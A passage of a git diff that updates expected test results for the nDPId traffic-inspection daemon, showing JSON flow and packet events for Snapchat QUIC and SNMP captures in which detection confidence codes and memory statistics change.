AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1595865799020,"flow_last_seen":1595865807311,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":10672,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1595865807311,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.SnapchatCall","breed":"Acceptable","category":"Cloud"}} -00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","packets-captured":50,"packets-processed":50,"total-skipped-flows":0,"total-l4-payload-len":10672,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1595865807311} +00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1595865799020,"flow_last_seen":1595865799615,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":8282,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1595865799615,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.SnapchatCall","breed":"Acceptable","category":"VoIP"},"quic": {}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1595865799020,"flow_last_seen":1595865807311,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":10672,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1595865807311,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.SnapchatCall","breed":"Acceptable","category":"VoIP"}} +00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","packets-captured":50,"packets-processed":50,"total-skipped-flows":0,"total-l4-payload-len":10672,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1595865807311} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 50/50 ~~ skipped flows.............: 0 @@ -15,10 +16,10 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870893 bytes -~~ total memory freed........: 5870893 bytes -~~ total allocations/frees...: 118164/118164 +~~ total memory allocated....: 6004527 bytes +~~ total memory freed........: 6004527 bytes +~~ total allocations/frees...: 120926/120926 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 2286 chars -~~ json string avg len.......: 1362 chars +~~ json string avg len.......: 1370 chars diff --git a/test/results/snmp.pcap.out b/test/results/snmp.pcap.out index 42e62c2df..b63fd8097 100644 --- a/test/results/snmp.pcap.out +++ b/test/results/snmp.pcap.out @@ -2,109 +2,109 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1597326815572} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326815572,"flow_last_seen":1597326815572,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326815572,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1597326815572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326815572,"pkt":"AAAAmdpxAAwpCIFqCABFAABHM75AAEARRUaw0zwrYQBzo6gHAKEAM+IpMCkCAQAEBnB1YmxpY6EcAgRLeBpuAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326815572,"flow_last_seen":1597326815572,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326815572,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326815572,"flow_last_seen":1597326815572,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326815572,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1597326815678,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1597326815678,"pkt":"AAwpCIFqAAAAmdpxCABFAABVAAIAAP8R+fNhAHOjsNM8KwChqAcAQdFWMDcCAQAEBnB1YmxpY6IqAgRLeBpuAgEAAgEAMBwwGgYIKwYBAgEBBgAEDkdsb2JvbWFudGljc0hR"} -00643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326815572,"flow_last_seen":1597326815678,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597326815678,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326815572,"flow_last_seen":1597326815678,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597326815678,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1597326815679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326815679,"pkt":"AAAAmdpxAAwpCIFqCABFAABHM+lAAEARRRuw0zwrYQBzo6gHAKEAM+EqMCkCAQAEBnB1YmxpY6AcAgRLeBpvAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326838035,"flow_last_seen":1597326838035,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326838035,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597326838035,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326838035,"pkt":"AAAAl9K2AAwpQXJyCABFAABHTItAAEAR8ldBAqLBgkaVuepUAKEAM4b6MCkCAQEEBnB1YmxpY6EcAgRQZ9ZcAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326838035,"flow_last_seen":1597326838035,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326838035,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326838035,"flow_last_seen":1597326838035,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326838035,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597326838141,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1597326838141,"pkt":"AAwpQXJyAAAAl9K2CABFAABVAAQAAP8Rv9CCRpW5QQKiwQCh6lQAQXYnMDcCAQEEBnB1YmxpY6IqAgRQZ9ZcAgEAAgEAMBwwGgYIKwYBAgEBBgAEDkdsb2JvbWFudGljc0hR"} -00644{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326838035,"flow_last_seen":1597326838141,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597326838141,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326838035,"flow_last_seen":1597326838141,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597326838141,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597326838143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326838143,"pkt":"AAAAl9K2AAwpQXJyCABFAABHTNhAAEAR8gpBAqLBgkaVuepUAKEAM4X7MCkCAQEEBnB1YmxpY6AcAgRQZ9ZdAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326858008,"flow_last_seen":1597326858008,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326858008,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1597326858008,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326858008,"pkt":"AAAAmdpxAAwpCIFqCABFAABHgc9AAEAR9zSw0zwrYQBzo5FoAKEAMzYdMCkCAQAEBnB1YmxpY6EcAgQJUAlZAgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326858008,"flow_last_seen":1597326858008,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326858008,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326858008,"flow_last_seen":1597326858008,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326858008,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1597326858136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1597326858136,"pkt":"AAwpCIFqAAAAmdpxCABFAABTAAYAAP8R+fFhAHOjsNM8KwChkWgAP8oWMDUCAQAEBnB1YmxpY6IoAgQJUAlZAgEAAgEAMBowGAYIKwYBAgEBBQAEDFIxLmxhYi5sb2NhbA=="} -00643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326858008,"flow_last_seen":1597326858136,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597326858136,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326858008,"flow_last_seen":1597326858136,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597326858136,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1597326858140,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326858140,"pkt":"AAAAmdpxAAwpCIFqCABFAABHgiVAAEAR9t6w0zwrYQBzo5FoAKEAMzUeMCkCAQAEBnB1YmxpY6AcAgQJUAlaAgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326863415,"flow_last_seen":1597326863415,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326863415,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597326863415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326863415,"pkt":"AAAAl9K2AAwpQXJyCABFAABHlH1AAEARqmVBAqLBgkaVueRBAKEAM6R0MCkCAQEEBnB1YmxpY6EcAgQesaH7AgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326863415,"flow_last_seen":1597326863415,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326863415,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326863415,"flow_last_seen":1597326863415,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326863415,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597326863591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1597326863591,"pkt":"AAwpQXJyAAAAl9K2CABFAABTAAgAAP8Rv86CRpW5QQKiwQCh5EEAPzhuMDUCAQEEBnB1YmxpY6IoAgQesaH7AgEAAgEAMBowGAYIKwYBAgEBBQAEDFIxLmxhYi5sb2NhbA=="} -00644{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326863415,"flow_last_seen":1597326863591,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597326863591,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326863415,"flow_last_seen":1597326863591,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597326863591,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":58433,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"snmp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597326863597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326863597,"pkt":"AAAAl9K2AAwpQXJyCABFAABHlIBAAEARqmJBAqLBgkaVueRBAKEAM6N1MCkCAQEEBnB1YmxpY6AcAgQesaH8AgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326976979,"flow_last_seen":1597326976979,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326976979,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1597326976979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1597326976979,"pkt":"AAAAuxzeAAwpBeNBCABFAABcyKtAAEARWi0eNo7w+jpwV9u7AKEASImwMD4CAQMwEQIEbJr1bgIDAP\/jBAEEAgEDBBAwDgQAAgEAAgEABAAEAAQAMBQEAAQAoA4CBHUFWIgCAQACAQAwAA=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"snmp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326976979,"flow_last_seen":1597326976979,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1597326976979,"l3_proto":"ip4","src_ip":"30.54.142.240","dst_ip":"250.58.112.87","src_port":56251,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 